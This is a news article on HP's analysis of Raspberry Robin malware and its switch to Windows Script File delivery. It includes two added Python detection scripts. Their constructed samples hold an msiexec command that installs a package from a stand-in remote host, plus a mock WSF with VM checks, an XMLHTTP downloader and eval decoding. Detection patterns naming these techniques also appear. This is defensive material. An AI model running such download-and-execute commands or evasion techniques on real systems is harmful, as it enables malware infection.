HP details evolution of Raspberry Robin malware, shift in distribution method and threat landscape


Researchers from the HP Threat Research team have observed a shift in the distribution method of Raspberry Robin in March 2024: the malware is now being disseminated through Windows Script Files (WSF). First identified in late 2021, Raspberry Robin was initially characterised as a Windows worm targeting the technology and manufacturing sectors. Over time it has evolved into a significant threat to enterprises.

Historically, Raspberry Robin was known to spread through removable media like USB drives, but its distributors have also experimented with other initial infection file types.

“Raspberry Robin is known for its heavy obfuscation and anti-analysis techniques to bypass detection, fool sandboxes, and slow down security teams seeking to understand the malware,” Patrick Schläpfer, malware analyst at HP, wrote in an HP Threat Research blog post. “Following infection, the malware communicates with its command and control (C2) servers over Tor. Raspberry Robin is capable of downloading and executing additional payloads, acting as a foothold for threat actors to deliver other malicious files.” 

Schläpfer detailed that the malware has been used to deliver families including SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot, as well as being a precursor of ransomware.

Since 2021, the operators spreading Raspberry Robin have used several methods to infect endpoints, including USB devices containing malicious Windows shortcut files (.lnk). The shortcut files run Windows Installer commands via msiexec.exe that download the payload from compromised QNAP network-attached storage devices. They have also used RAR archive files hosted on Discord; each archive contains an EXE and a DLL. The EXE is a legitimate signed binary and uses DLL side-loading to load and run the malicious payload DLL.

The operators have also used 7-Zip (.7z) archive files downloaded through the victim's web browser. Each archive contains a malicious Windows Installer (.msi) package that infects the PC with Raspberry Robin. More recently they adopted malicious adverts that, when clicked, download malicious ZIP files hosted on Discord that lead to Raspberry Robin.
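The two Windows Installer vectors above (a shortcut driving msiexec.exe to fetch a package from a remote host, and a downloaded archive dropping an .msi that is then installed) both leave a mark in process-creation telemetry. The following is an added example, not HP's code: it runs a small triage over constructed Sysmon-style process events and flags msiexec.exe launches whose package source is a URL or a user-writable download or temp path. The field names, sample paths and the 203.0.113.10 host are assumptions made for the example.

```python
"""Triage msiexec.exe launches for the Raspberry Robin delivery patterns:
a Windows Installer package pulled from a remote URL, or an .msi run
from a user-writable download/temp location.  Added example; the event
layout (key=value, quoted where needed) and field names are assumptions."""
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    # .lnk on a USB stick -> explorer.exe -> msiexec fetching a remote package
    r'Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /q /i http://203.0.113.10:8080/ab?c=1" ParentImage=C:\Windows\explorer.exe',
    # .7z opened in the browser download folder, dropped .msi installed quietly
    r'Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /i C:\Users\alice\Downloads\update\setup.msi /qn" ParentImage="C:\Program Files\7-Zip\7zFM.exe"',
    # benign: software deployment agent installing from a staging directory
    r'Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /i C:\Windows\Temp\Deploy\app.msi /qn" ParentImage=C:\Windows\CCM\CcmExec.exe',
    # unrelated process, must be ignored
    r'Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\alice\Downloads\notes.txt" ParentImage=C:\Windows\explorer.exe',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
# Paths an ordinary user can write to and a browser/archiver drops files into.
USER_WRITABLE_RE = re.compile(r'\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\', re.IGNORECASE)
QUIET_RE = re.compile(r'(?:^|\s)[/-]q(?:uiet|n|b)?\b', re.IGNORECASE)


def parse_event(line):
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {k: (q if q else u) for k, q, u in KV_RE.findall(line)}


def triage_msiexec(event):
    """Return a list of findings for an msiexec.exe event, or None if nothing stands out."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if not image.lower().endswith("\\msiexec.exe"):
        return None
    findings = []
    url = URL_RE.search(cmd)
    if url:
        # msiexec will happily install straight from an HTTP source.
        findings.append(f"remote package source {urlparse(url.group()).netloc}")
    if USER_WRITABLE_RE.search(cmd):
        findings.append("package in user-writable download/temp path")
    # A quiet install is only interesting together with an untrusted source.
    if findings and QUIET_RE.search(cmd):
        findings.append("quiet install")
    return findings or None


def scan(lines):
    """Run the triage over raw event lines; returns (parent, command line, findings) per hit."""
    hits = []
    for line in lines:
        event = parse_event(line)
        findings = triage_msiexec(event)
        if findings:
            hits.append((event.get("ParentImage", ""), event.get("CommandLine", ""), findings))
    return hits


if __name__ == "__main__":
    for parent, cmd, findings in scan(SAMPLE_EVENTS):
        print(f"{parent}\n  {cmd}\n  -> {', '.join(findings)}")
```

The parent process is kept in the output because it is what separates the two chains in the article: explorer.exe as parent points at a shortcut, an archiver or browser as parent points at the web-download chain.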

Schläpfer noted that at the beginning of 2024 the malware was still being spread through archive files delivered as web downloads. “In campaigns since early March 2024, however, its distributors swapped archive files with Windows Script Files (.wsf). These files are widely used by administrators and legitimate software to automate tasks within Windows but can also be abused by attackers. The WSF file format supports scripting languages, such as JScript and VBScript, that are interpreted by the Windows Script Host component built into the Windows operating system,” he added.

The Windows Script Files are offered for download via various malicious domains and subdomains controlled by the attackers. It’s not clear how threat actors are luring users to the malicious URLs. However, this could be via spam or malvertising campaigns.

“The script file acts as a downloader. Like the Raspberry Robin DLL, the script uses a variety of anti-analysis and virtual machine (VM) detection techniques. The final payload is only downloaded and executed when all these evaluation steps indicate that the malware is running on a real end-user device, rather than in a sandbox,” according to Schläpfer. “The scripts are highly obfuscated. At the time of analysis, they were not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware.”
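The WSF format described two paragraphs up and the downloader's anti-VM checks described here lend themselves to a static triage step before a sample ever reaches wscript.exe. The following is an added example, not code from HP or from the Raspberry Robin analysis: it pulls each `<script language="...">` body out of a .wsf, records which Windows Script Host languages it uses, and scores a set of indicator patterns (WMI hardware queries, VM vendor strings, XMLHTTP downloaders, WScript.Shell, eval/fromCharCode decoding, very long string literals). The indicator names, the threshold and both sample files are the example's own constructions, not HP's published indicators.

```python
"""Static triage of a Windows Script File (.wsf).  A WSF is an XML-like
job file whose <script language="..."> elements carry JScript or VBScript
for Windows Script Host.  Added example, not HP's code; indicator patterns
and thresholds are assumptions, and the two sample files are constructed."""
import math
import re

SCRIPT_RE = re.compile(
    r'<script\b[^>]*\blanguage\s*=\s*["\']?([A-Za-z]+)["\']?[^>]*>(.*?)</script>',
    re.IGNORECASE | re.DOTALL,
)
STRING_RE = re.compile(r'"([^"\n]*)"')  # double-quoted literals (VBScript and JScript)

# Indicators an obfuscated WSH downloader with VM checks tends to carry.
INDICATORS = {
    "wmi_hardware_query": re.compile(r'Win32_(?:ComputerSystem|BIOS|VideoController|DiskDrive)', re.I),
    "vm_vendor_string": re.compile(r'\b(?:VMware|VirtualBox|VBOX|QEMU|Hyper-V|Xen)\b', re.I),
    "http_download": re.compile(r'MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest', re.I),
    "file_write": re.compile(r'ADODB\.Stream|Scripting\.FileSystemObject', re.I),
    "shell_exec": re.compile(r'WScript\.Shell|\.Run\(|\.Exec\(', re.I),
    "dynamic_code": re.compile(r'\beval\s*\(|\bExecute(?:Global)?\b|new\s+Function\s*\(', re.I),
    "char_decoding": re.compile(r'String\.fromCharCode|\bChrW?\s*\(|\bunescape\s*\(', re.I),
}
LONG_LITERAL = 200   # characters; encoded blobs are usually far longer
SUSPICIOUS_SCORE = 4


def shannon_entropy(text):
    """Bits per character; reported for the analyst, not used in the score."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage_wsf(text):
    """Extract script bodies from a .wsf and score them against INDICATORS."""
    scripts = SCRIPT_RE.findall(text)
    body = "\n".join(b for _, b in scripts)
    languages = sorted({lang.lower() for lang, _ in scripts})
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
    longest = max((len(m.group(1)) for m in STRING_RE.finditer(body)), default=0)
    score = len(hits) + (1 if longest >= LONG_LITERAL else 0)
    return {
        "languages": languages,
        "indicators": hits,
        "longest_literal": longest,
        "entropy": round(shannon_entropy(body), 2),
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_SCORE else "unremarkable",
    }


# Constructed sample: VM check in VBScript, downloader scaffolding in JScript.
# BLOB is filler to stand in for an encoded second stage; it is not a payload.
BLOB = "".join(f"{(i * 37) % 256:02x}" for i in range(150))  # 300 hex chars
SAMPLE_WSF = r'''<job id="Job1">
<script language="VBScript">
Set wmi = GetObject("winmgmts:\\.\root\cimv2")
For Each cs In wmi.ExecQuery("SELECT Manufacturer FROM Win32_ComputerSystem")
  If InStr(1, cs.Manufacturer, "VMware", 1) > 0 Then WScript.Quit
Next
</script>
<script language="JScript">
var blob = "''' + BLOB + r'''";  // constructed filler, not a payload
var http = new ActiveXObject("MSXML2.XMLHTTP");
var sh = new ActiveXObject("WScript.Shell");
eval(String.fromCharCode(118, 97, 114, 32, 111, 107, 61, 49));
</script>
</job>'''

# Constructed control: the kind of admin script WSF is legitimately used for.
BENIGN_WSF = r'''<job>
<script language="VBScript">
WScript.Echo "Backup completed at " & Now
</script>
</job>'''

if __name__ == "__main__":
    for name, sample in (("sample", SAMPLE_WSF), ("benign", BENIGN_WSF)):
        print(name, triage_wsf(sample))
```

The score deliberately counts distinct capabilities rather than raw pattern hits, so a script that both fingerprints the hardware and can fetch and run something scores high even before any deobfuscation. Where an estate has no legitimate use for Windows Script Host at all, the stronger control is to disable it outright by setting the `Enabled` DWORD to 0 under `HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings`, which stops wscript.exe and cscript.exe from running .wsf, .js and .vbs files regardless of how they arrived.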

In conclusion, Schläpfer said that the recent activity represents the latest in a series of shifts in the way Raspberry Robin is distributed. Although best known for spreading through USB drives, threat actors deploying Raspberry Robin have been using different infection vectors such as web downloads to achieve their objectives. 

Additionally, the HP research said the WSF downloader is heavily obfuscated and uses a wide range of anti-analysis and anti-VM techniques, enabling the malware to evade detection and slow down analysis. “This is particularly concerning given that Raspberry Robin has been used as a precursor for human-operated ransomware. Countering this malware early on in its infection chain should be a high priority for security teams,” the post added.

In December 2022, Trend Micro reported Raspberry Robin samples, seen since September of that year, at victims largely in government agencies and telecommunication entities across Latin America, Oceania (Australia), and Europe. The main payload is packed in more than ten layers of obfuscation and delivers a fake payload once it detects sandboxing or security analysis tools.
